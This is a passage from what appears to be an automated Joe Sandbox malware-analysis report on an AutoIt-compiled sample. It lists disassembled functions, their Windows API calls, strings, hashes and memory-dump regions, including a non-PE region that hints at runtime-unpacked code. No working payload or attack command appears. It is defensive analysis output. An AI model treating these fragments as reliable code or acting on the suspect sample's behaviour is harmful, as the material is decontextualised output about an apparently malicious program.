                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                      • API String ID: 1038674560-1810252412
                      • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                      • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                      • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                      • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                      Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                      • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                      • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                      • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                      • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                      • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                      • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                      • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                      • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                      • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                      • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                      • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                      • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                      • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                      • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                      • GetCursorInfo.USER32(?), ref: 004750C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Cursor$Load$Info
                      • String ID:
                      • API String ID: 2577412497-0
                      • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                      • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                      • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                      • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                      Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 0048A259
                      • DestroyWindow.USER32(?,?), ref: 0048A2D3
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                      • DestroyWindow.USER32(00000000), ref: 0048A3A4
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                      • GetDesktopWindow.USER32 ref: 0048A40D
                      • GetWindowRect.USER32(00000000), ref: 0048A414
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                        • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                      • String ID: 0$tooltips_class32
                      • API String ID: 1297703922-3619404913
                      • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                      • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                      • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                      • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                      Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00484424
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharMessageSendUpper
                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                      • API String ID: 3974292440-4258414348
                      • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                      • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                      • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                      • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                      Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                      • GetDriveTypeW.KERNEL32 ref: 0046A418
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                      • API String ID: 2698844021-4113822522
                      • Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                      • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                      • Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
                      • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                      Function 0048C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                      • GetFocus.USER32 ref: 0048C20C
                      • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                      • _memset.LIBCMT ref: 0048C342
                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                      • GetMenuItemCount.USER32(?), ref: 0048C38D
                      • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                      • String ID: 0
                      • API String ID: 1296962147-4108050209
                      • Opcode ID: bd24d1798a429d48612d4fb07f1efb563176f6f0fa598044465ce7e723a2363a
                      • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                      • Opcode Fuzzy Hash: bd24d1798a429d48612d4fb07f1efb563176f6f0fa598044465ce7e723a2363a
                      • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                      Function 0047731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 0047738F
                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                      • CreateCompatibleDC.GDI32(?), ref: 004773A7
                      • SelectObject.GDI32(00000000,?), ref: 004773B4
                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                      • SelectObject.GDI32(00000006,?), ref: 00477470
                      • DeleteObject.GDI32(?), ref: 00477479
                      • DeleteDC.GDI32(00000006), ref: 00477480
                      • ReleaseDC.USER32(00000000,?), ref: 0047748B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: 1df89f8f9c1f54aae833a9d5101421b859ac3cca0f9286444877ec68b0466c1f
                      • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                      • Opcode Fuzzy Hash: 1df89f8f9c1f54aae833a9d5101421b859ac3cca0f9286444877ec68b0466c1f
                      • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                      Function 00406A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                        • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                        • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                        • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                      • API String ID: 537147316-1018226102
                      • Opcode ID: f2279d342799b2d8ac053d02583c029e5605faf8829a82c443068f2cc29d005e
                      • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                      • Opcode Fuzzy Hash: f2279d342799b2d8ac053d02583c029e5605faf8829a82c443068f2cc29d005e
                      • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                      Function 00462D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00462D50
                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                      • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                      • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                      • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                      • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                      • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                      • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                      • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                      • GetCursorPos.USER32(?), ref: 00462F56
                      • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                      • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                      • String ID:
                      • API String ID: 3993528054-0
                      • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                      • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                      • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                      • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                      Function 02F924FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 02F92543
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93090
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930A2
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930B4
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930C6
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930D8
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930EA
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F930FC
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F9310E
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93120
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93132
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93144
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93156
                        • Part of subcall function 02F93073: _free.LIBCMT ref: 02F93168
                      • _free.LIBCMT ref: 02F92538
                        • Part of subcall function 02F92096: HeapFree.KERNEL32(00000000,00000000,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?), ref: 02F920AC
                        • Part of subcall function 02F92096: GetLastError.KERNEL32(?,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?,?), ref: 02F920BE
                      • _free.LIBCMT ref: 02F9255A
                      • _free.LIBCMT ref: 02F9256F
                      • _free.LIBCMT ref: 02F9257A
                      • _free.LIBCMT ref: 02F9259C
                      • _free.LIBCMT ref: 02F925AF
                      • _free.LIBCMT ref: 02F925BD
                      • _free.LIBCMT ref: 02F925C8
                      • _free.LIBCMT ref: 02F92600
                      • _free.LIBCMT ref: 02F92607
                      • _free.LIBCMT ref: 02F92624
                      • _free.LIBCMT ref: 02F9263C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: 822a09d6865b4949ec39141da7724e6534a183b8786501df204fcce45297260d
                      • Instruction ID: 981001dcefd6b5d75428b6f57874af795cc90a967e54e25382507f17a7b79532
                      • Opcode Fuzzy Hash: 822a09d6865b4949ec39141da7724e6534a183b8786501df204fcce45297260d
                      • Instruction Fuzzy Hash: 5A310671A00305ABFF31AA39DC54B56B3EABB007D5F144469EA9AD6260EF71A980CF10
                      Function 004788AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 004788D7
                      • CoInitialize.OLE32(00000000), ref: 00478904
                      • CoUninitialize.OLE32 ref: 0047890E
                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                      • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                      • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                      • VariantClear.OLEAUT32(?), ref: 00478C35
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                      • String ID: ,,I
                      • API String ID: 2395222682-4163367948
                      • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                      • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                      • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                      • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                      Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                      • API String ID: 3964851224-909552448
                      • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                      • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                      • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                      • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                      Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                        • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
